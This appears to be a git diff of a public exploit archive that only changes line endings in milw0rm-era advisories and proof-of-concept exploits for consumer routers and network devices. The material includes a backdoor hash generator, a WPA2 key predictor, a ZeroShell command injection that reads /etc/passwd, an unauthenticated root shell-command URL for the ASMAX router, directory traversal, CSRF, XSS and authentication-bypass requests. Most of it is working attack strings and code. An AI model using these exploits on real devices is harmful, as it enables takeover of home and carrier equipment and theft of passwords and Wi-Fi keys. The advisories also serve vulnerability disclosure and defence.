( 56 - last ) : ( 120 - last ); + + md5_update( ctx, md5_padding, padn ); + md5_update( ctx, msglen, 8 ); + + PUT_UINT32( ctx->state[0], digest, 0 ); + PUT_UINT32( ctx->state[1], digest, 4 ); + PUT_UINT32( ctx->state[2], digest, 8 ); + PUT_UINT32( ctx->state[3], digest, 12 ); +} + +//#ifdef TEST + + + +/* + * those are the standard RFC 1321 test vectors + */ + +static char *msg[] = +{ + "", + "a", + "abc", + "message digest", + "abcdefghijklmnopqrstuvwxyz", + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789", + "12345678901234567890123456789012345678901234567890123456789012" \ + "345678901234567890" +}; + +static char *val[] = +{ + "d41d8cd98f00b204e9800998ecf8427e", + "0cc175b9c0f1b6a831c399e269772661", + "900150983cd24fb0d6963f7d28e17f72", + "f96b697d7cb7938d525a2f31aaf161d0", + "c3fcd3d76192e4007dfb496cca67e13b", + "d174ab98d277d9f5a5611c2c9f419d9f", + "57edf4a22be3c955ac49da2e2107b67a" +}; + +static char saltOrig[] = +{0x04, 0x07, 0x67, 0x10, 0x02, 0x81, 0xFA, 0x66, 0x11, 0x41, 0x68, +0x11, 0x17, 0x01, 0x05, 0x22, 0x71, 0x04, 0x10, 0x33}; + +int main( int argc, char *argv[] ) +{ + FILE *f; + int i, j; + char output[33]; + md5_context ctx; + unsigned char buf[1000]; + unsigned char md5sum[16]; + unsigned char salt[20]; + + printf( "****************************\n"); + printf( "Alice BackDoor hash creator \n"); + printf( "by saxdax and drPepperOne \n"); + printf( "****************************\n\n"); + + if( argc < 2 ) + { + printf( "\n Usage: %s pathfileMAC\n\n", argv[0] ); + return 0; + } + + if( ! 
( f = fopen( argv[1], "rb" ) ) ) + { + perror( "fopen" ); + return( 1 ); + } + + md5_starts( &ctx ); + + while( ( i = fread( buf, 1, sizeof( buf ), f ) ) > 0 ) + { + md5_update( &ctx, buf, i ); + } + + memcpy(salt, saltOrig, 20); + + md5_update( &ctx, salt, 20 ); + + md5_finish( &ctx, md5sum ); + + printf("Payload is: "); + for( j = 0; j < 8; j++ ) + { + printf( "%02x", md5sum[j] ); + } + + return( 0 ); +} + + + + + + + +############################################################################################# + +====== +5) Fix +====== + + +Atcualy at 13 Oct 2008 NO FIX available. + +############################################################################################# + +# milw0rm.com [2008-10-14] diff --git a/platforms/hardware/remote/6899.txt b/platforms/hardware/remote/6899.txt index e778d7f6e..ebc52b9b3 100755 --- a/platforms/hardware/remote/6899.txt +++ b/platforms/hardware/remote/6899.txt 
@@ -1,122 +1,122 @@ - Louhi Networks Information Security Research - Security Advisory - - - Advisory: A-Link WL54AP3 and WL54AP2 CSRF+XSS vulnerability - Release Date: 2008/10/31 -Last Modified: 2008/10/28 - Authors: Jussi Vuokko, CISSP [jussi.vuokko@louhi.fi] - Henri Lindberg [henri.lindberg@louhi.fi] - - Device: A-Link WL54AP3 and WL54AP2 (any firmware) - Severity: CSRF and XSS in management interface - Risk: Moderate -Vendor Status: Vendor has released an updated version - References: http://www.louhinetworks.fi/advisory/alink_081028.txt - - -Overview: - - Quote from http://www.a-link.com/ - "WLAN Access point 54MB, 4-port - Wlan Access point, wireless 54Mbps, DSSS, 802.11g-standard based and - it's compatible also with other manufacturers cards." - - During an audit of A-Link WLAN54AP3 it was discovered that a cross - site request forgery vulnerability exists in the management - interface. It is possible for an attacker to perform any - administrative actions in the management interface, if victim - can be lured or forced to view malicious content. These administrative - actions include e.g. changing admin user's username and password, - DNS settings etc. - - In addition, it was discovered that no input validation or output - encoding is performed in management interface, thus making it - vulnerable to cross-site scripting. - - By default admin password is blank and no authentication is performed - for requests to administrative interface. As ordinary consumers usually - use out-of-the-box settings, this vulnerability offers same kind of - phishing possibilities as used in Banamex attacks[1]. - - A-Link WLAN54AP2 (EOL) is vulnerable to this threat as well. - - [1] http://www.google.fi/search?q=banamex+phishing+dns+poison - - -Details: - - A-Link WLAN54AP3 does not validate the origin of an HTTP request. If - attacker is able to make user view malicious content, the WLAN54AP3 - device can be controlled by submitting suitable forms. 
Attacker is - effectively acting as an administrator. - - Successful attack requires that the attacker knows the management - interface address for the target device (default IP address is - 192.168.1.254). As the management interface does not have logout - functionality, user can be vulnerable to this attack even after - closing a tab containing the management interface (if user does not - close the browser window or clear cookies and depending on browser - behaviour) or if default blank password is used. - - -Proof of Concept: - - CSRF: - - Example form (changes DNS servers, enables WAN web server access - and changes user's username and password): - - - - - - - - - - -
- - - - - - - - XSS: - - Add following content to management interface's Management - DDNS - - Domain Name: - - "">

+ +
+ + + + + + +
+ + + + + + + + XSS: + + Add following content to management interface's Management - DDNS - + Domain Name: + + "">

alert('DSecRG XSS') -http://[server]/user/help/general_help_user.shtml? - - - -Solution -******** - -Vendor decided that this vulnerability is not critical and there is no -patches for this firmware. But maybe he will patch issues on the next firmware release - - -Vendore response: - -[13.01.2009]: "We don't see any major vulnerability issues with the current firmware of Axis 70U but we will consider the mentioned issues on the next firmware release." - - - -About -***** - -Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. - -Contact: research [at] dsec [dot] ru - http://www.dsecrg.com - http://www.dsec.ru - -# milw0rm.com [2009-01-21] +Digital Security Research Group [DSecRG] Advisory #DSECRG-09-004 +AXIS 70U Network Document Server - Privilege Escalation and XSS + +http://dsecrg.com/pages/vul/show.php?id=60 + + +Application: AXIS 70U Network Document Server (Web Interface) +Versions Affected: 3.0 +Vendor URL: http://www.axis.com/ +Bug: Local File Include and Privilege Escalation, Multiple Linked XSS +Exploits: YES +Reported: 20.10.2008 +Vendor response: 20.10.2008 +Last response: 02.01.2009 +Vendor Case ID: 143027 +Solution: NONE +Date of Public Advisory: 19.01.2009 +Authors: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) + + + +Description +*********** + +Vulnerabilities found in Web Interface of device AXIS 70U Network Document Server. + +1. Local File Include and Privilege Escalation. + +Standard user can escalate privileges to administrator. + +2. Multiple Linked XSS vulnerabilities + + + +Details +******* + +1. Local File Include and Privilege Escalation. 
+ +Local File Include vulnerability found in script user/help/help.shtml + +User can unclude any local files even in admin folder. + +Example: + +http://[server]/user/help/help.shtml?/admin/this_server/this_server.shtml + + +2. Multiple Linked XSS vulnerabilities + +Linked XSS vulnerability found in scripts: + +user/help/help.shtml +user/help/general_help_user.shtml + +Attacker can inject XSS script in URL. + +Example: + +http://[server]/user/help/help.shtml? +http://[server]/user/help/general_help_user.shtml? + + + +Solution +******** + +Vendor decided that this vulnerability is not critical and there is no +patches for this firmware. But maybe he will patch issues on the next firmware release + + +Vendore response: + +[13.01.2009]: "We don't see any major vulnerability issues with the current firmware of Axis 70U but we will consider the mentioned issues on the next firmware release." + + + +About +***** + +Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. + +Contact: research [at] dsec [dot] ru + http://www.dsecrg.com + http://www.dsec.ru + +# milw0rm.com [2009-01-21] diff --git a/platforms/hardware/remote/7915.txt b/platforms/hardware/remote/7915.txt index 48169c05b..c7a304647 100755 --- a/platforms/hardware/remote/7915.txt +++ b/platforms/hardware/remote/7915.txt 
@@ -1,27 +1,27 @@
-#####################################################################################
-#
-# Name : Motorola Wimax modem CPEi300 Multiple Vulnerabilities
-# Author : Usman Saeed
-# Company : Xc0re Security Reasearch Group
-# Homepage : http://www.xc0re.net
-#
-#####################################################################################
-
-
-[Note: User needs to logged in! ]
-
-[*] Attack type : Remote
-
-[*] Patch Status : Unpatched
-
-[*] Exploitation :
-
- [+] Directory traversal
- http://Hostname/cgi-bin/sysconf.cgi?page=../../../etc/passwd&action=request&sid=AeoFSFoI4lDs
-
- [+] XSS
-
- http://Hostname/cgi-bin/sysconf.cgi?page=">"&action=request&sid=AeoFSFoI4lDs
-
-
-# milw0rm.com [2009-01-29]
+#####################################################################################
+#
+# Name : Motorola Wimax modem CPEi300 Multiple Vulnerabilities
+# Author : Usman Saeed
+# Company : Xc0re Security Reasearch Group
+# Homepage : http://www.xc0re.net
+#
+#####################################################################################
+
+
+[Note: User needs to logged in! ]
+
+[*] Attack type : Remote
+
+[*] Patch Status : Unpatched
+
+[*] Exploitation :
+
+ [+] Directory traversal
+ http://Hostname/cgi-bin/sysconf.cgi?page=../../../etc/passwd&action=request&sid=AeoFSFoI4lDs
+
+ [+] XSS
+
+ http://Hostname/cgi-bin/sysconf.cgi?page=">"&action=request&sid=AeoFSFoI4lDs
+
+
+# milw0rm.com [2009-01-29]
diff --git a/platforms/hardware/remote/8022.txt
index c41a457fc..42f386cef 100755
--- a/platforms/hardware/remote/8022.txt
+++ b/platforms/hardware/remote/8022.txt
@@ -1,16 +1,16 @@
-====================================================
-3Com OfficeConnect Wireless Cable/DSL Router Authentication Bypass
-
-Original Advisory:
-http://www.ikkisoft.com/stuff/LC-2008-05.txt
-
-luca.carettoni[at]ikkisoft[dot]com
-====================================================
-
-An unauthenticated user may directly invoke the "SaveCfgFile" CGI program and
-easily download the system configuration containing configuration information,
-users, passwords, wifi keys and other sensitive information.
-
-http:///SaveCfgFile.cgi
-
-# milw0rm.com [2009-02-09]
+====================================================
+3Com OfficeConnect Wireless Cable/DSL Router Authentication Bypass
+
+Original Advisory:
+http://www.ikkisoft.com/stuff/LC-2008-05.txt
+
+luca.carettoni[at]ikkisoft[dot]com
+====================================================
+
+An unauthenticated user may directly invoke the "SaveCfgFile" CGI program and
+easily download the system configuration containing configuration information,
+users, passwords, wifi keys and other sensitive information.
+
+http:///SaveCfgFile.cgi
+
+# milw0rm.com [2009-02-09]
diff --git a/platforms/hardware/remote/8023.txt
index 6e25e12a6..4aef15a08 100755
--- a/platforms/hardware/remote/8023.txt
+++ b/platforms/hardware/remote/8023.txt
@@ -1,34 +1,34 @@
-====================================================
-ZeroShell <= 1.0beta11 Remote Code Execution
-
-Original Advisory:
-http://www.ikkisoft.com/stuff/LC-2009-01.txt
-
-luca.carettoni[at]ikkisoft[dot]com
-====================================================
-
-
-ZeroShell (http://www.zeroshell.net/eng/) is a small Linux distribution
-for servers and embedded devices. This Linux distro can be configured
-and managed with an easy to use web console.
-
-ZeroShell is prone to an arbitrary code execution vulnerability due to
-an improper input validation mechanism. An aggressor may abuse this
-weakness in order to compromise the entire system.
-Authentication is not required in order to exploit this flaw.
-
-[Proof of Concept]
-
-/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;;%22
-
-In addition to the Unix commands, it is possible to abuse the
-ZeroShell scripts themself. For instance it is likely to use the
-"getkey" script in order to retrieve remote files, including the content
-in the html page.
-
-{HTTP REQUEST}
-GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;
-/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1
-Host:
-
-# milw0rm.com [2009-02-09]
+====================================================
+ZeroShell <= 1.0beta11 Remote Code Execution
+
+Original Advisory:
+http://www.ikkisoft.com/stuff/LC-2009-01.txt
+
+luca.carettoni[at]ikkisoft[dot]com
+====================================================
+
+
+ZeroShell (http://www.zeroshell.net/eng/) is a small Linux distribution
+for servers and embedded devices. This Linux distro can be configured
+and managed with an easy to use web console.
+
+ZeroShell is prone to an arbitrary code execution vulnerability due to
+an improper input validation mechanism. An aggressor may abuse this
+weakness in order to compromise the entire system.
+Authentication is not required in order to exploit this flaw.
+
+[Proof of Concept]
+
+/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;;%22
+
+In addition to the Unix commands, it is possible to abuse the
+ZeroShell scripts themself. For instance it is likely to use the
+"getkey" script in order to retrieve remote files, including the content
+in the html page.
+
+{HTTP REQUEST}
+GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;
+/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1
+Host:
+
+# milw0rm.com [2009-02-09]
diff --git a/platforms/hardware/remote/8096.txt
index 76600c4cc..e481fe1bf 100755
--- a/platforms/hardware/remote/8096.txt
+++ b/platforms/hardware/remote/8096.txt
@@ -1,63 +1,63 @@ -XSS Attack using SMS to Optus/Huawei E960 HSDPA Router - -Synopsis --------- - -Huawei E960 HSDPA Router (firmware version 246.11.04.11.110sp04) is -vulnerable to XSS attack using SMS. One of the feature of this router -is the ability to send and receive SMS through its web interface. The -SMS text is presented unescaped/unfiltered on the inbox view, and an -attacker can craft malicious short messages to gain control over -victims router. - -Details --------- -The first 32 characters of every incoming SMS is presented in -unescaped form in the inbox view. The 32 characters limit can be -overcome by using several messages, and inserting javascript comment -to merge the current message with the next one. - -Example: - -First message ends with /* which will comment the all the HTML code up -to the second message - - - -Note that newest message is presented first, so the order of the SMS -sending must be reversed. - -Impact ------- -An attacker can -- get victim's PPP password by accessing /js/connection.js -- disconnect victim's internet connection -- send SMS with victim's router -- gain access to victim's WIFI password - -Recovery --------- -After an attack is performed, the inbox page can not be used to delete -the received messages (because the delete button is not -available/visible). To remove offending messages from the inbox, -telnet to the router with username 'admin' and password 'admin'. -Huawei E960 uses busybox shell, so standard rm command can be used to -remove the messages (it is located at /tmp/sms/inbox_sms). After -removing the message content, the deleted messages will still be in -the inbox index, but it can now be removed from the inbox page. - - -Credits -------- -Rizki Wicaksono (http://www.ilmuhacking.com) found this vulnerability. -The Indonesian article at -http://www.ilmuhacking.com/web-security/xss-attack-using-sms-huawei-e960-hsdpa-router/ -gives more detail about this vulnerability. 
This English -translation/summary was done by Yohanes Nugroho. - -# milw0rm.com [2009-02-23] +XSS Attack using SMS to Optus/Huawei E960 HSDPA Router + +Synopsis +-------- + +Huawei E960 HSDPA Router (firmware version 246.11.04.11.110sp04) is +vulnerable to XSS attack using SMS. One of the feature of this router +is the ability to send and receive SMS through its web interface. The +SMS text is presented unescaped/unfiltered on the inbox view, and an +attacker can craft malicious short messages to gain control over +victims router. + +Details +-------- +The first 32 characters of every incoming SMS is presented in +unescaped form in the inbox view. The 32 characters limit can be +overcome by using several messages, and inserting javascript comment +to merge the current message with the next one. + +Example: + +First message ends with /* which will comment the all the HTML code up +to the second message + + + +Note that newest message is presented first, so the order of the SMS +sending must be reversed. + +Impact +------ +An attacker can +- get victim's PPP password by accessing /js/connection.js +- disconnect victim's internet connection +- send SMS with victim's router +- gain access to victim's WIFI password + +Recovery +-------- +After an attack is performed, the inbox page can not be used to delete +the received messages (because the delete button is not +available/visible). To remove offending messages from the inbox, +telnet to the router with username 'admin' and password 'admin'. +Huawei E960 uses busybox shell, so standard rm command can be used to +remove the messages (it is located at /tmp/sms/inbox_sms). After +removing the message content, the deleted messages will still be in +the inbox index, but it can now be removed from the inbox page. + + +Credits +------- +Rizki Wicaksono (http://www.ilmuhacking.com) found this vulnerability. 
+The Indonesian article at +http://www.ilmuhacking.com/web-security/xss-attack-using-sms-huawei-e960-hsdpa-router/ +gives more detail about this vulnerability. This English +translation/summary was done by Yohanes Nugroho. + +# milw0rm.com [2009-02-23] diff --git a/platforms/hardware/remote/829.c b/platforms/hardware/remote/829.c index 82a6a502d..98a01924c 100755 --- a/platforms/hardware/remote/829.c +++ b/platforms/hardware/remote/829.c @@ -88,6 +88,6 @@ int main(int argc, char *argv[]) { close(fd); return 1; -} - -// milw0rm.com [2005-02-19] +} + +// milw0rm.com [2005-02-19] diff --git a/platforms/hardware/remote/8316.txt b/platforms/hardware/remote/8316.txt index 1287a35ad..5c50a6889 100755 --- a/platforms/hardware/remote/8316.txt +++ b/platforms/hardware/remote/8316.txt 
@@ -1,41 +1,41 @@
-NOKIA Siemens FlexiISN GGSN Multiple Authentication bypass Vulnerability: NOKIA Siemens FlexiISN
-
-Remote: Yes
-
-Local: No
-
-Class: Input Validation Error
-
-Critical: Moderately critical
-
-OS : FlexiISN (GGSN) FISN 3.1
-
-URL 1 for bypassing authentication on AAA Configuration: http://[Flexi-ISN IP]/cgi-bin/aaa.tcl?
-
-URL 2 for bypassing authentication on Aggregation Class Configuration : http://[Flexi-ISN IP]/cgi-bin/aggr_config.tcl?
-
-URL 3 for bypassing authentication on GGSN general Configuration : http://[Flexi-ISN IP]/opt/cgi-bin/ggsn/cgi.tcl?page=ggsnconf
-
-URL 4 for bypassing authentication on Network Access & services : http://[Flexi-ISN IP]/opt/cgi-bin/services.tcl?instance=default
-
-Published: March 30, 2009
-
-Discovered by: TaMbaRuS (tambarus@gmail.com)
-
-Site: www.nokiasiemensnetworks.com
-
-Greetz: Mr. Gabriel Waller from NSN for all his support for researching on the vulnerabilities.
-
-Description:
-
-The Flexi ISN, which performs GPRS Gateway Service Node (GGSN) and data charging functionalities,
-is fully integrated with the existing Nokia Siemens Networks charge@once prepaid solution to enable
-flexible charging of data services. The systems integration services ensure seamless consumer experience,
-while managing an increasingly complex combination of new processes and systems.
-
-With the introduction of Flexi ISN, mobile telekom service provider is able to combine all in one box a
-GGSN and an Intelligent Charging Node. The deployed Flexi ISN 3.1 system is able, through deep packet
-inspection, to distinguish the type of traffic such as HTTP browsing, WAP browsing, MMS, streaming,
-content download thus enabling different charging models based on the type of data service used.
-
-# milw0rm.com [2009-03-30]
+NOKIA Siemens FlexiISN GGSN Multiple Authentication bypass Vulnerability: NOKIA Siemens FlexiISN
+
+Remote: Yes
+
+Local: No
+
+Class: Input Validation Error
+
+Critical: Moderately critical
+
+OS : FlexiISN (GGSN) FISN 3.1
+
+URL 1 for bypassing authentication on AAA Configuration: http://[Flexi-ISN IP]/cgi-bin/aaa.tcl?
+
+URL 2 for bypassing authentication on Aggregation Class Configuration : http://[Flexi-ISN IP]/cgi-bin/aggr_config.tcl?
+
+URL 3 for bypassing authentication on GGSN general Configuration : http://[Flexi-ISN IP]/opt/cgi-bin/ggsn/cgi.tcl?page=ggsnconf
+
+URL 4 for bypassing authentication on Network Access & services : http://[Flexi-ISN IP]/opt/cgi-bin/services.tcl?instance=default
+
+Published: March 30, 2009
+
+Discovered by: TaMbaRuS (tambarus@gmail.com)
+
+Site: www.nokiasiemensnetworks.com
+
+Greetz: Mr. Gabriel Waller from NSN for all his support for researching on the vulnerabilities.
+
+Description:
+
+The Flexi ISN, which performs GPRS Gateway Service Node (GGSN) and data charging functionalities,
+is fully integrated with the existing Nokia Siemens Networks charge@once prepaid solution to enable
+flexible charging of data services. The systems integration services ensure seamless consumer experience,
+while managing an increasingly complex combination of new processes and systems.
+
+With the introduction of Flexi ISN, mobile telekom service provider is able to combine all in one box a
+GGSN and an Intelligent Charging Node. The deployed Flexi ISN 3.1 system is able, through deep packet
+inspection, to distinguish the type of traffic such as HTTP browsing, WAP browsing, MMS, streaming,
+content download thus enabling different charging models based on the type of data service used.
+
+# milw0rm.com [2009-03-30]
diff --git a/platforms/hardware/remote/8359.py
index 488d7bfe4..7e4ffd241 100755
--- a/platforms/hardware/remote/8359.py
+++ b/platforms/hardware/remote/8359.py
@@ -1,31 +1,31 @@
-#!/usr/bin/python
-#
-# Pirelli Discus DRG A225 WiFi router
-# Default WPA2-PSK algorithm vulnerability
-#
-# paper: http://milw0rm.com/papers/313
-#
-# With this code we can predict the WPA2-PSK key...
-#
-# Hacked up by Muris Kurgas aka j0rgan
-# j0rgan (-@-) remote-exploit.org
-# http://www.remote-exploit.org
-#
-# Use for education or legal penetration testing purposes.....
-#
-import sys
-
-def hex2dec(s):
- return int(s, 16)
-
-if len(sys.argv) < 2 or len(sys.argv[1]) != 6:
- print "\r\nEnter the last 6 chars from Discus SSID"
- print "i.e. SSID should be 'Discus--XXXXXX', where XXXXXX is last 6 chars\r\n"
- exit()
-const = hex2dec('D0EC31')
-inp = hex2dec(sys.argv[1])
-result = (inp - const)/4
-
-print "Possible PSK for Discus--"+sys.argv[1]+" would be: YW0"+str(result)
-
-# milw0rm.com [2009-04-06]
+#!/usr/bin/python
+#
+# Pirelli Discus DRG A225 WiFi router
+# Default WPA2-PSK algorithm vulnerability
+#
+# paper: http://milw0rm.com/papers/313
+#
+# With this code we can predict the WPA2-PSK key...
+#
+# Hacked up by Muris Kurgas aka j0rgan
+# j0rgan (-@-) remote-exploit.org
+# http://www.remote-exploit.org
+#
+# Use for education or legal penetration testing purposes.....
+#
+import sys
+
+def hex2dec(s):
+ return int(s, 16)
+
+if len(sys.argv) < 2 or len(sys.argv[1]) != 6:
+ print "\r\nEnter the last 6 chars from Discus SSID"
+ print "i.e. SSID should be 'Discus--XXXXXX', where XXXXXX is last 6 chars\r\n"
+ exit()
+const = hex2dec('D0EC31')
+inp = hex2dec(sys.argv[1])
+result = (inp - const)/4
+
+print "Possible PSK for Discus--"+sys.argv[1]+" would be: YW0"+str(result)
+
+# milw0rm.com [2009-04-06]
diff --git a/platforms/hardware/remote/8696.txt
index 3bf582768..00b5ddec3 100755
--- a/platforms/hardware/remote/8696.txt
+++ b/platforms/hardware/remote/8696.txt
@@ -1,32 +1,32 @@
-D-Link Captcha Bypass
--------------------------------------
-D-Link released new firmware designed to protect against malware that
-alters DNS settings by logging in to the router using default administrative
-credentials. There is a flaw in the captcha authentication system that allows
-an attacker to glean your WiFi WPA pass phrase from the router with only user-level
-access, and without properly solving the captcha.
-
-When you login with the captcha enabled, the request looks like this:
-
- GET /post_login.xml?hash=c85d324a36fbb6bc88e43ba8d88b10486c9a286a&auth_code=0C52F&auth_id=268D2
-
-The hash is a salted MD5 hash of your password, the auth_code is the captcha value that
-you entered, and the auth_id is unique to the captcha image that you viewed
-(this presumably allows the router to check the auth_code against the proper captcha image).
-The problem is that if you leave off the auth_code and auth_id values, some pages in the
-D-Link Web interface think that you’ve properly authenticated, as long as you get
-the hash right:
-
- GET /post_login.xml?hash=c85d324a36fbb6bc88e43ba8d88b10486c9a286a
-
-Most notably, once you’ve made the request to post_login.xml, you can activate
-WPS with the following request:
-
- GET /wifisc_add_sta.xml?method=pbutton&wps_ap_ix=0
-
-When WPS is activated, anyone within WiFi range can claim to be a valid WPS client and
-retrieve the WPA passphrase directly from the router.
-
-More info on WPS et al. at http://www.sourcesec.com/2009/05/12/d-link-captcha-partially-broken/
-
-# milw0rm.com [2009-05-15]
+D-Link Captcha Bypass
+-------------------------------------
+D-Link released new firmware designed to protect against malware that
+alters DNS settings by logging in to the router using default administrative
+credentials. There is a flaw in the captcha authentication system that allows
+an attacker to glean your WiFi WPA pass phrase from the router with only user-level
+access, and without properly solving the captcha.
+
+When you login with the captcha enabled, the request looks like this:
+
+ GET /post_login.xml?hash=c85d324a36fbb6bc88e43ba8d88b10486c9a286a&auth_code=0C52F&auth_id=268D2
+
+The hash is a salted MD5 hash of your password, the auth_code is the captcha value that
+you entered, and the auth_id is unique to the captcha image that you viewed
+(this presumably allows the router to check the auth_code against the proper captcha image).
+The problem is that if you leave off the auth_code and auth_id values, some pages in the
+D-Link Web interface think that you’ve properly authenticated, as long as you get
+the hash right:
+
+ GET /post_login.xml?hash=c85d324a36fbb6bc88e43ba8d88b10486c9a286a
+
+Most notably, once you’ve made the request to post_login.xml, you can activate
+WPS with the following request:
+
+ GET /wifisc_add_sta.xml?method=pbutton&wps_ap_ix=0
+
+When WPS is activated, anyone within WiFi range can claim to be a valid WPS client and
+retrieve the WPA passphrase directly from the router.
+
+More info on WPS et al. at http://www.sourcesec.com/2009/05/12/d-link-captcha-partially-broken/
+
+# milw0rm.com [2009-05-15]
diff --git a/platforms/hardware/remote/8846.txt b/platforms/hardware/remote/8846.txt
index 67c951c2f..263280ec7 100755
--- a/platforms/hardware/remote/8846.txt
+++ b/platforms/hardware/remote/8846.txt
@@ -1,22 +1,22 @@
-1. ASMAX 804 gu router is a SOHO class device. It provides ADSL / WiFi / Ethernet interfaces.
-
-2. There is an *unauthenticated* maintenance script (named 'script') in /cgi-bin/ directory of the web management interface.
-
-3. When 'system' paramether is passed to the script it allows running OS shell commands (as root).
-
-4. PoC:
-GET request to:
-http://192.168.1.1/cgi-bin/script?system%20whoami
-
-Returns:
-root
-
-5. Using CSRF attack one could remotely own a router using for example simple html tags pointing to http://192.168.1.1/...
-
-6. The issue was tested on firmware: 66.34.1
-
-7. The vendor was notified on 30.12.08, but we got no reasonable response till now (the bug remains unpatched).
-
-8. More information: http://www.securitum.pl/dh/asmax-ar-804-gu-compromise
-
-# milw0rm.com [2009-06-01]
+1. ASMAX 804 gu router is a SOHO class device. It provides ADSL / WiFi / Ethernet interfaces.
+
+2. There is an *unauthenticated* maintenance script (named 'script') in /cgi-bin/ directory of the web management interface.
+
+3. When 'system' paramether is passed to the script it allows running OS shell commands (as root).
+
+4. PoC:
+GET request to:
+http://192.168.1.1/cgi-bin/script?system%20whoami
+
+Returns:
+root
+
+5. Using CSRF attack one could remotely own a router using for example simple html tags pointing to http://192.168.1.1/...
+
+6. The issue was tested on firmware: 66.34.1
+
+7. The vendor was notified on 30.12.08, but we got no reasonable response till now (the bug remains unpatched).
+
+8. More information: http://www.securitum.pl/dh/asmax-ar-804-gu-compromise
+
+# milw0rm.com [2009-06-01]
diff --git a/platforms/hardware/remote/8963.txt b/platforms/hardware/remote/8963.txt
index 644ef8f1f..57772feae 100755
--- a/platforms/hardware/remote/8963.txt
+++ b/platforms/hardware/remote/8963.txt
@@ -1,103 +1,103 @@ -Product Name: Netgear DG632 Router -Vendor: http://www.netgear.com -Date: 15 June, 2009 -Author: tom@tomneaves.co.uk < tom@tomneaves.co.uk > -Original URL: http://www.tomneaves.co.uk/Netgear_DG632_Authentication_Bypass.txt -Discovered: 18 November, 2006 -Disclosed: 15 June, 2009 - -I. DESCRIPTION - -The Netgear DG632 router has a web interface which runs on port 80. -This allows an admin to login and administer the device's settings. -Authentication of this web interface is handled by a script called -"webcm" residing in "/cgi-bin/" which redirects to the relevant pages -depending on successful user authentication. Vulnerabilities in this -interface enable an attacker to access files and data without -authentication. - -II. DETAILS - -The "webcm" script handles user authentication and attempts to load -"indextop.htm" (via javascript below). The "indextop.htm" page requires -authentication (HTTP Basic Authorization). - ---- - - - - -Loading file ... -
- - - ---- - -If a valid password to the default "admin" user is supplied, the script -then continues to load the "indextop.htm" page and continues to load the -other frames based on a hidden field. If user authentication is -unsuccessful, the user is returned back to "../cgi-bin/webcm". It is -possible to bypass the "webcm" script and access specific files directly -without the need for authentication. - -Normal use: -http://TARGET_IP/cgi-bin/webcm?nextpage=../html/stattbl.htm - -This would ask for the user to authenticate and would refuse access to -this file if authentication details were not known. All the script is -doing is making sure authentication is forced upon the user. The same -"stattbl.htm" file can be accessed without having to provide any -authentication using the following URL: - -http://TARGET_IP/html/stattbl.htm - -Another example: -http://192.168.0.1/cgi-bin/webcm?nextpage=../html/modemmenu.htm -(returns 401 - Forbidden) - -Bypassing the "webcm" script: -http://192.168.0.1/html/modemmenu.htm -(returns 200 - OK) - -In the example above (modemmenu.htm), the full source can be viewed -which discloses further directories and files within the javascript of -the page. A sample of files disclosed within modemmenu.htm and available -to download are: - -/html/onload.htm -/html/form.css -/gateway/commands/saveconfig.html -/html/utility.js (full source) - -There are many other files that are accessible by calling them directly -instead of going via the "webcm" script, the above are just a sample. In -addition, it is possible to specify paths to the "webcm" script as shown -below: - -http://TARGET_IP/cgi-bin/webcm?nextpage=../../ - -This allows an attacker to enumerate what files and directories exist -within the www root directory and beyond by using 200, 403 and 404 -errors as a guide. - -Affected Versions: Firmware V3.4.0_ap (others unknown) - -III. VENDOR RESPONSE - -12 June, 2009 - Contacted vendor. -15 June, 2009 - Vendor responded. 
Stated the DG632 is an end of life -product and is no longer supported in a production and development -sense, as such, there will be no further firmware releases to resolve -this issue. - -IV. CREDIT - -Discovered by Tom Neaves - -# milw0rm.com [2009-06-15] +Product Name: Netgear DG632 Router +Vendor: http://www.netgear.com +Date: 15 June, 2009 +Author: tom@tomneaves.co.uk < tom@tomneaves.co.uk > +Original URL: http://www.tomneaves.co.uk/Netgear_DG632_Authentication_Bypass.txt +Discovered: 18 November, 2006 +Disclosed: 15 June, 2009 + +I. DESCRIPTION + +The Netgear DG632 router has a web interface which runs on port 80. +This allows an admin to login and administer the device's settings. +Authentication of this web interface is handled by a script called +"webcm" residing in "/cgi-bin/" which redirects to the relevant pages +depending on successful user authentication. Vulnerabilities in this +interface enable an attacker to access files and data without +authentication. + +II. DETAILS + +The "webcm" script handles user authentication and attempts to load +"indextop.htm" (via javascript below). The "indextop.htm" page requires +authentication (HTTP Basic Authorization). + +--- + + + + +Loading file ... +
+ + + +--- + +If a valid password to the default "admin" user is supplied, the script +then continues to load the "indextop.htm" page and continues to load the +other frames based on a hidden field. If user authentication is +unsuccessful, the user is returned back to "../cgi-bin/webcm". It is +possible to bypass the "webcm" script and access specific files directly +without the need for authentication. + +Normal use: +http://TARGET_IP/cgi-bin/webcm?nextpage=../html/stattbl.htm + +This would ask for the user to authenticate and would refuse access to +this file if authentication details were not known. All the script is +doing is making sure authentication is forced upon the user. The same +"stattbl.htm" file can be accessed without having to provide any +authentication using the following URL: + +http://TARGET_IP/html/stattbl.htm + +Another example: +http://192.168.0.1/cgi-bin/webcm?nextpage=../html/modemmenu.htm +(returns 401 - Forbidden) + +Bypassing the "webcm" script: +http://192.168.0.1/html/modemmenu.htm +(returns 200 - OK) + +In the example above (modemmenu.htm), the full source can be viewed +which discloses further directories and files within the javascript of +the page. A sample of files disclosed within modemmenu.htm and available +to download are: + +/html/onload.htm +/html/form.css +/gateway/commands/saveconfig.html +/html/utility.js (full source) + +There are many other files that are accessible by calling them directly +instead of going via the "webcm" script, the above are just a sample. In +addition, it is possible to specify paths to the "webcm" script as shown +below: + +http://TARGET_IP/cgi-bin/webcm?nextpage=../../ + +This allows an attacker 